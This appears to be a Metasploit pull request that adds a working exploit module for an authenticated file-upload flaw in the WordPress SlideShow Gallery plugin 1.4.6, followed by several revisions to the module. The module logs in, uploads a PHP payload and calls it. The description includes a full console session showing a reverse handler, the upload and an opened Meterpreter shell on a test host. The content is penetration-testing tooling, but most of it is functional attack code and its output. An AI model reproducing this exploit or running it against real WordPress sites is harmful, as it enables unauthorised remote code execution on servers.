### PR TITLE
Add Module WordPress Slideshow Upload

### DIFF
--- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
+++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
@@ -1,0 +1,112 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'           => 'Wordpress SlideShow Gallery Authenticated File Upload',
+      'Description'    => %q{
+          The Wordpress SlideShow Gallery plugin contains an auhtenticated file upload
+          vulnerability. We can upload arbitrary files to the upload folder, because
+          the plugin also uses it's own file upload mechanism instead of the wordpress
+          api it's possible to upload any file type. The user provided does not need
+          special rights, and users with "Contributor" role can be abused.
+      },
+      'Author'         =>
+        [
+          'TO DO', # Vulnerability discovery
+          'Roberto Soares Espreto'     # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2014-2222'],
+          ['URL', 'http://domain.html'],
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['WP SlideShow Gallery 1.4.6', {}]],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 28 2014'))
+
+    register_options(
+      [
+        OptString.new('USER', [true, 'A valid username', nil]),
+        OptString.new('PASSWORD', [true, 'Valid password for the provided username', nil])
+      ], self.class)
+  end
+
+  def user
+    datastore['USER']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def check
+    check_plugin_version_from_readme('Slideshow Gallery', '1.4.6')
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to login as #{user}")
+    cookie = wordpress_login(user, password)
+    if cookie.nil?
+      print_error("#{peer} - Unable to login as #{user}")
+      return
+    end
+
+    print_status("#{peer} - Trying to upload payload")
+    filename = "#{rand_text_alpha_lower(8)}.php"
+
+    data = Rex::MIME::Message.new
+    data.add_part("", nil, nil, 'form-data; name="Slide[id]"')
+    data.add_part("", nil, nil, 'form-data; name="Slide[link]"')
+    data.add_part("", nil, nil, 'form-data; name="Slide[image_url]"')
+    data.add_part('both', nil, nil, 'form-data; name="Slide[showinfo]"')
+    data.add_part('randonx', nil, nil, 'form-data; name="Slide[description]"')
+    data.add_part('file', nil, nil, 'form-data; name="Slide[type]"')
+    data.add_part('randonx', nil, nil, 'form-data; name="Slide[title]"')
+    data.add_part('70', nil, nil, 'form-data; name="Slide[iopacity]"')
+    data.add_part('N', nil, nil, 'form-data; name="Slide[uselink]"')
+    data.add_part("", nil, nil, 'form-data; name="Slide[order]"')
+    data.add_part('self', nil, nil, 'form-data; name="Slide[linktarget]"')
+    data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"")
+    post_data = data.to_s
+
+    print_status("#{peer} - Uploading payload")
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(wordpress_url_backend, 'admin.php'),
+      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+      'vars_get' => {
+        'page' => 'slideshow-slides',
+        'method' => 'save'
+      },
+      'data'     => post_data,
+      'cookie'   => cookie
+    })
+
+    if res && res.code == 200
+      register_files_for_cleanup(filename)
+    else
+      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+    end
+
+    print_status("#{peer} - Calling uploaded file #{filename}")
+    send_request_cgi({
+      'uri'    => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename)
+    }, 2)
+  end
+end

--- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
+++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    check_plugin_version_from_readme('slideshow-gallery', '1.4.6')
+    check_plugin_version_from_readme('slideshow-gallery', '1.4.7')
   end
 
   def exploit

--- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
+++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
@@ -43,17 +43,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
     register_options(
       [
-        OptString.new('USER', [true, 'A valid username', nil]),
-        OptString.new('PASSWORD', [true, 'Valid password for the provided username', nil])
+        OptString.new('WP_USER', [true, 'A valid username', nil]),
+        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
       ], self.class)
   end
 
   def user
-    datastore['USER']
+    datastore['WP_USER']
   end
 
   def password
-    datastore['PASSWORD']
+    datastore['WP_PASSWORD']
   end
 
   def check

--- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
+++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
@@ -103,10 +103,10 @@ class Metasploit3 < Msf::Exploit::Remote
       if res.code == 200
         register_files_for_cleanup(filename)
       else
-        fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+        fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
       end
     else
-      fail_with('ERROR')
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
     end
 
     print_status("#{peer} - Calling uploaded file #{filename}")

--- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
+++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
@@ -99,15 +99,19 @@ class Metasploit3 < Msf::Exploit::Remote
       'cookie'   => cookie
     })
 
-    if res && res.code == 200
-      register_files_for_cleanup(filename)
+    if res
+      if res.code == 200
+        register_files_for_cleanup(filename)
+      else
+        fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+      end
     else
-      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
+      fail_with('ERROR')
     end
 
     print_status("#{peer} - Calling uploaded file #{filename}")
-    send_request_cgi({
+    send_request_cgi(
       'uri'    => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename)
-    }, 2)
+    )
   end
 end

--- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
+++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
@@ -24,14 +24,14 @@ class Metasploit3 < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'TO DO', # Vulnerability discovery
+          'Jesus Ramirez Pichardo', # Vulnerability discovery
           'Roberto Soares Espreto'     # Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['CVE', '2014-2222'],
-          ['URL', 'http://domain.html'],
+          ['CVE', '2014-5460'],
+          ['EDB', '34681'],
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],

--- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
+++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
@@ -32,6 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['CVE', '2014-5460'],
           ['EDB', '34681'],
+          ['WPVDB', '7532']
         ],
       'Privileged'     => false,
       'Platform'       => ['php'],

--- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
+++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
@@ -19,8 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
           The Wordpress SlideShow Gallery plugin contains an authenticated file upload
           vulnerability. We can upload arbitrary files to the upload folder, because
           the plugin also uses it's own file upload mechanism instead of the wordpress
-          api it's possible to upload any file type. The user provided does not need
-          special rights, and users with "Contributor" role can be abused.
+          api it's possible to upload any file type.
       },
       'Author'         =>
         [
@@ -103,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote
       if res.code == 200
         register_files_for_cleanup(filename)
       else
-        fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
       end
     else
       fail_with(Failure::Unknown, 'Server did not respond in an expected way')

--- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
+++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
       info,
       'Name'           => 'Wordpress SlideShow Gallery Authenticated File Upload',
       'Description'    => %q{
-          The Wordpress SlideShow Gallery plugin contains an auhtenticated file upload
+          The Wordpress SlideShow Gallery plugin contains an authenticated file upload
           vulnerability. We can upload arbitrary files to the upload folder, because
           the plugin also uses it's own file upload mechanism instead of the wordpress
           api it's possible to upload any file type. The user provided does not need
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'         =>
         [
           'Jesus Ramirez Pichardo', # Vulnerability discovery
-          'Roberto Soares Espreto'     # Metasploit module
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'     # Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'References'     =>

--- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
+++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb
@@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    check_plugin_version_from_readme('Slideshow Gallery', '1.4.6')
+    check_plugin_version_from_readme('slideshow-gallery', '1.4.6')
   end
 
   def exploit


### PR DESCRIPTION
#### Add WordPress SlideShow Gallery 1.4.6 Shell Upload.

  Application: WordPress Tribulant Slideshow Gallery
  Homepage: https://wordpress.org/plugins/slideshow-gallery/
  Source Code: https://downloads.wordpress.org/plugin/slideshow-gallery.1.4.6.zip
#### Vulnerable packages*

  1.4.6
#### Usage:
##### Linux (Ubuntu 12.04.5 LTS):

```
msf > use exploit/unix/webapp/wp_slideshowgallery_upload 
msf exploit(wp_slideshowgallery_upload) > show options 

Module options (exploit/unix/webapp/wp_slideshowgallery_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Valid password for the provided username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   USER                        yes       A valid username
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   WP SlideShow Gallery 1.4.6


msf exploit(wp_slideshowgallery_upload) > info

       Name: Wordpress SlideShow Gallery Authenticated File Upload
     Module: exploit/unix/webapp/wp_slideshowgallery_upload
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2014-08-28

Provided by:
  Jesus Ramirez Pichardo
  Roberto Soares Espreto

Available targets:
  Id  Name
  --  ----
  0   WP SlideShow Gallery 1.4.6

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  PASSWORD                    yes       Valid password for the provided username
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  USER                        yes       A valid username
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  The Wordpress SlideShow Gallery plugin contains an auhtenticated 
  file upload vulnerability. We can upload arbitrary files to the 
  upload folder, because the plugin uses it's own file upload 
  mechanism instead of the wordpress api it's possible to upload any 
  file type. The user provided does not need special rights, and users 
  with "Contributor" role can be abused.

References:
  http://cvedetails.com/cve/2014-5460/
  http://www.exploit-db.com/exploits/34681/

msf exploit(wp_slideshowgallery_upload) > set RHOST 192.168.1.31
RHOST => 192.168.1.31
msf exploit(wp_slideshowgallery_upload) > set USER espreto
USER => espreto
msf exploit(wp_slideshowgallery_upload) > set PASSWORD xxxxxxx
PASSWORD => xxxxxxx
msf exploit(wp_slideshowgallery_upload) > exploit 

[*] Started reverse handler on 192.168.1.46:4444 
[*] 192.168.1.31:80 - Trying to login as espreto
[*] 192.168.1.31:80 - Trying to upload payload
[*] 192.168.1.31:80 - Uploading payload
[*] 192.168.1.31:80 - Calling uploaded file tfyteogt.php
[*] Sending stage (40499 bytes) to 192.168.1.31
[*] Meterpreter session 1 opened (192.168.1.46:4444 -> 192.168.1.31:40298) at 2015-04-13 03:46:36 -0300
[+] Deleted tfyteogt.php

meterpreter > sysinfo 
Computer    : msfdevel
OS          : Linux msfdevel 3.13.0-49-generic #81~precise1-Ubuntu SMP Wed Mar 25 16:32:40 UTC 2015 i686
Meterpreter : php/php
meterpreter >
```
